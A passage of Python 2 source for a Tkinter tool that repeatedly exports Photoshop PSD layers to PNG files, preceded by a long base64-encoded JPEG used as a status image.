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691D6w/lcfI/4Z9dw4n4d/NTtLLwYTHJV0/S/d9am5Otstl4apKqXG7dzMcf8a6/xNXFqgRIkrFjQKG1G7+/de6qQ+WP81r5t9db4zPX24uhqWj7D2csdFmthbwk3PiG3czVmh891zUQTyU27NvzAFKatjiliqZGWMiFlb37r3Sgq/ni/cu19s9YdDbE3BvDubtTEwUNdhds4Wt3JvHb1RVRimyzZIU8EkWycdiaoSReadKYRPE13HpJ917qxDqn+QJ8Tc71HS1/dmD3dN3lu2gmy24914nd25MFXYHLZb/LP4fUw43cEi7jmw9XIxaWsnmE0lx/m7D37r3VVfzY/lL9j/DLFVO5dk5jKdj9IippSd/10WOiy+xpaqYRSSdoUdOsLHa1K0gEeUolkeFQoqIwFapPuvdEq6t/l1fL/srGVPeO0utt/TxjtGg6h2jsZcNVYxt1Csw+4Jt1dk5esyEMMeN2lg8wlEKetqE9TQzIjIJVUe691uSfy0Pgpgvgd8e6HYLTUOY7I3XWf3s7U3TSQeNcvuqtgjWampXdEnbGYtF8UGsBmsXIDOffuvdWI+/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuv/R3+Pfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Vf38wPEpJtHqPcsqXi212pBSu9yBG289sZ/ZcJuPUGefNqAR+T7917rDs/BpVYLaC5VYcBsjE7WxmSKI0bKduYSgSszGVmlikknVq/KK6Ir+t5SRawUe/de6SG5s426KHfW6ctBJT4moxJzGSx8U5pa18LS0ksPWHWVIInjqI5szV+Our40Pqj0OVuhHv3XukRsKPP7h+IHyywLUDVW5q/EZ2lgwGHD1tU2TyOw8e4xtHTp5Jp6t5m0AAEySX0349+690WDF9ibE606R6qo997y2/tvc2xMP3Rt7IbKasOT3vVZDclLLHgYaTamGTJ5hmrda2MkUajVyRyPfuvdOG4/kvtndeNxOSoetu3MZgqroCv6nrcvu/b9D19AlVVGhmqMrjG3NkI6ito44aQgHwozkgW9+690E83zh717Q39tHJ/Fj4/4ze2+eu9pZXrnBbupYdz7swlLgMvVYw5v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3DZSLKVijIwSy/cPLFLEyC0mtOCD7917o7fTv8sz4OdDblxO8OtPj5szEbkwBdsFlq+Osz1ThZpBpepxf8bqa9KGrZRbyxhXA4BA9+690e4AAAAAAcAAWAH9AB9Pfuvdd+/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r//X3+Pfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3XvfuvdAx3l8eelPkrs6Tr3vfrTaHaWy5amKsfAbvxEWUpUq4DqgqaZnZJKaeNubqeRwbj37r3RUNm/ysviLsbL4mqw+3d8Ve1sHk4c1i+rs/2LujcHVVLlaOVZcbWDY2VranFT/wAJZB9rFKHghsCqalUj3XurEKengpIIqalhip6eBFihggjWKGKNAFSOONAqIiqLAAWHv3XuvJUQSSyQJPC80OkzQpIjSxauV8kYYumofS4F/fuvdF9+WHx9x/yn+O/anQWTzo2vB2XtiqwEe4ziTnlwVZI8U9FlWwwyeEfJiiqoVk8K1lIz2sJU+vv3XutXDdX8jb+YZtHNZuu6+3z8cd7YGfEVuIp8VX7h37tnJfw3INj5augxtZVbdzTUkbiiK2mMrEyOrySo7Fvde6Od8Hv5LUVNvVO2/l1tLGU8eFn8u3On49yQ7wxmdyz1kOSn3F2BVrQU9HUUeOrotGKxFOz08UIElVJUSlRF7r3WyBR0dJjqSnoaCmgo6Kkhjp6Wlpo0hp6eCJQkUMMUYVI440AAAAAA9+691J9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691//Q3+Pfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3XvfuvdUIYLrbvXfPze+b+x9r/Mntbq/tLr7KbA7U6sxM+SxW7erpequwduNBicBuXr/NxSU0ePo947Wy0MslBJQ1PgZP3A41t7r3RjeoP5oHXOJ6Hxe7fk9kKfbvZ2N7H7G6gzGD6zwG4t+LvLcfVOWq8ZuTdmyMBtyiy2eqNqvSUorJ5DG6UAcxySEgM3uvdGf7K+b/SewerusezsRU5zssd4xYt+lNm9f4qbMby7OlzNJFX0K4DFP4Pt6RKKZZaqrq2gpaKI6p5I1F/fuvdEz2v81Oq+jvlt8iW+UHYmD+PmK3V1Z8euwcFt3tvdeExlTt+o3VQ70x9ftxmpcjXYqTJY6p2xIao0k00IIL6ypDe/de6sY3z8oPjx1p1rhe4t+dy9fbY6t3GmLk2/vrJ7joE25m480EOKkxVfFJLHXpXLIGQxagVN/pc+/de6R2+Pmv8AGLrumrZt09s7dpKmi3RhtmDDUbzZTcdfufcOFg3HhcNiduY2KqzeUrchgKhayNIIHZqa720gke690IOR+RfQ2H3ViNi5jt/rvEb0zsUM2J2nk924Wi3BXLUX8IgxdRWJVtJIQQF06ieLX9+690CGM7pzXS03yP7C+UvcfVtB1Xgey8TRddrgo5KWTYOzMlhMLT4vGb5q5Glll3HmM1PJN/qBFNGwIRgqe690jtk/zPPiXvnrLtTtil3Xubbe2OnpcIu7oN9bI3NsrOtSbrSF9mZXDYLcWPoMnmMTvL7hFxs8MbLUSEoAHVlHuvdCt8a/mB178mchv/AbdwO8dnbr61nwo3Rtfe+Kix2Rp8duWg/im3cxT1FHU12Nq6DLUILoY5meMqVcKwt7917ozozmFaKKdcxizDPL4IZhkKQxTTEMfDFIJtEktlJ0gk2B9+691nosnjskJ2x2QosgtLO9LUtRVcFUKeqjsZKacwSSCKeO41I1mF+R7917qb7917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de6//0d/j37r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3WuX8wP5PA+VX8y7dnc1VuHtzqPYfYvxnoMa/a3TG9J9tV9J29tHPQ4+lpN20D5GSmzVFX7Xq4/FTS4+elmSlYO8bqvk917oNd5/y2vkH17jeiKjsDovGfI/ZfV20OyenstsL4o9l5HonduWwmc3PFltt9lViZPN7Qw9Zkd5Y6KQbtxzZEwS1UqSJ5tHv3Xujx434pfK3ceI+N3fmzNv9PfHfunoDbfYHXew+gc1UZPf/W+K6Y3lU7d/h23Nw5+hjxlXS9jUFNs7HyNX0ImpKYyz0yipT99/de6WXWnw07RqPmJjfkh8jdt9T9j7i3x8eMn1v2Lm8JgIGwG3snhN3jJbSweBx+e+6yE1LPgs5WRS1IVTK0BZ9GpVb3XuiL9x/wAjfsPsWvp+n07c2pm/ifLnM+cFtncuNzB3b03sjdnZkfYu6NrddQQVb4SfI5CJP4PR5CVYWxmLVYYoyusP7r3R9Orv5W2xusu9ekvkJuLtfc3YO5ekukdy9LS1m9Mdgmn3fiJ6vHpsndu5q2mpqSmXd2xNs00+MSvjijlqYJyzstip917qmL5ubf8Aj11D2fjPjXvr5MfBDA7L773RuvIbg7U3xsbG57vbrTEU9OMhBNkt2/34jgXcsYaOixGQMKtGyxXgYodXuvdWb7p/lcbW+RfTfdOD2f8AJvJ7i6Y+UWJ+MO/NtZp8fFuub+8PUGOxdNUb2XcDZKGn3Lh+zNr4LEq8HiiWKWKWbXIJdC+690UX+bd8suofjjuPsP467S+FEXyZ7B7C+P3XtL3lvLcO7RsXqPZ2xNrVO44+uDvDPU5qHwe4qTJrWVWPKCgnc+Px1GpF8fuvdLT/AIT6/Hr5gbO+OtV2R3mvVmwupe9afcu6Nu9U4vZG5x3QKfMZEUW1czvntbcW5qvJ53F0e0aZYcZT1NH94tHJD5JgUC+/de6P/L/Kz6+x21vjfsbZvcfcO2do/H7vLNdzT41s/FkqjsSmy+I3JiI9hbnrZ4UkO2MVS7g8NMiAlKeEKbyESr7r3Rz+jfjztLoKbs6Taec3flY+0+xcz2XmKXc+Z/i1Lic1m4qaKrotvxmnhagxIFMpWJmkIJ/VawHuvdD37917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de6/9Lf49+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3XvfuvdE5+cXxbz3y76Wk6nwHauf6omk3Bis1W5HDSZVaDcdBjmkabau6abB5jAZXIbZyhcfc08VZCJggV9UZZG917opfw0/k/dB/F7fVR25uXGbF7C7KOGq8Bhf4X1dtDZmxto47I1ENVlZsBtqgoqipqs1mJqdDU5HJVVdWuAVWRVZgfde6t0p6enpIIaWkghpaanjSGCnp4khggijULHFDDGqxxxooACqAABx7917onXZf8v34jdxd3Y75C9ndO4HenZeNpsFDHV56avrtv1lRtaeqqNs5XKbRmqm2zlc5t+Wsk+zrJ6WSogBAVwAAPde6ONBBDTQxU9NFHBTwRpFDBCixxRRRqFSOONAFREUAAAWA9+691l9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3X/2Q==
"""
}
# preserve temporary data
data = {
"app":None,
"running_times": 0,
"generated_files": [],
}
# format options
if opt["app_options"]["width"] < 30:
opt["app_options"]["width"] = 30
if opt["app_options"]["height"] < 30:
opt["app_options"]["height"] = 30
# add option setting files to ignores
opt["ignores"].append(opt["preview_file"])
opt["ignores"].append(opt["coord_file"])
### main thread starts here ###
def psd2png(app, stop_event):
""" main layer save logic """
# store app, stop event
data["app"] = app
data["stop_event"] = stop_event
def run():
# run count
data["running_times"] += 1
# show image at app canvas
onwork_image = Image.open(cStringIO.StringIO(base64.b64decode(opt["onwork_image_source"])))
data["app"].preview_image = ImageTk.PhotoImage(onwork_image)
data["app"].view_canvas.create_image((onwork_image.size[0]/2,
onwork_image.size[1]/2),
image=data["app"].preview_image)
# load psd file
data["app"].output.config(text="[+] loading psd file")
psd = PSDImage.load(opt["file_name"])
data["app"].output.config(text="[+] saving layers as png files")
save_layers_to_png(psd)
# clear unused files
data["app"].output.config(text="[+] removing unsued files")
remove_files_not_in_layers(psd)
if opt["create_preview"]:
data["app"].output.config(text="[+] creating preview file")
create_preview(psd)
if opt["create_coord"]:
data["app"].output.config(text="[+] creating coordination file")
create_coord(psd)
while not data["stop_event"].is_set():
run()
"""
try:
run()
except:
print ("Error: ignoring io error")
pass
"""
if not data["stop_event"].is_set():
recharging_image = Image.open(cStringIO.StringIO(base64.b64decode(opt["recharging_image_source"])))
data["app"].preview_image = ImageTk.PhotoImage(recharging_image)
data["app"].view_canvas.create_image((recharging_image.size[0]/2,
recharging_image.size[1]/2),
image=data["app"].preview_image)
data["app"].output.config(text="[+] Run count: %d times"%(data["running_times"]))
print("[+] Run count: %d times"%(data["running_times"]))
# wait for delay
time.sleep(opt["delay_sec"])
# thread terminates
def makedirs(dirname):
""" create folder """
if not os.path.exists(dirname):
os.makedirs(dirname)
# Tkinter needs to preserve reference to temp image
def save_layers_to_png(psd, groupname=None):
""" grab layers and save as png files """
# save scope: called after confirm parameters
def save_layer(layer, groupname=None):
try:
# handle PIL error
layer_image = layer.as_PIL()
except:
# generaly occurs when layer is empty
print "[!] as_PIL Error: ", layer.name
return
# update output
if data["app"] != None:
# text
app.output.config(text=layer.name)
# save image
dirname=opt["dirname"]
# directory for groups
if not groupname == None:
dirname += "/" + groupname
makedirs(dirname)
targetfile = "%s/%s.png"%(dirname, layer.name)
if os.path.isfile(targetfile):
# if file is already exists,
# comapre hash
existing_file_hash = imagehash.average_hash(Image.open(targetfile))
layer_hash = imagehash.average_hash(layer_image)
if not existing_file_hash == layer_hash:
print ("Found changed layer: %s"%(layer.name))
layer_image.save("%s/%s.png"%(dirname, layer.name))
else:
pass
else:
# create new file
print ("Found new layer: %s"%(layer.name))
layer_image.save("%s/%s.png"%(dirname, layer.name))
data["generated_files"].append(layer.name)
layer_image.save("%s/%s.png"%(dirname, layer.name))
data["generated_files"].append(layer.name)
# delivery keyword
layer_comp = layer.name.split()
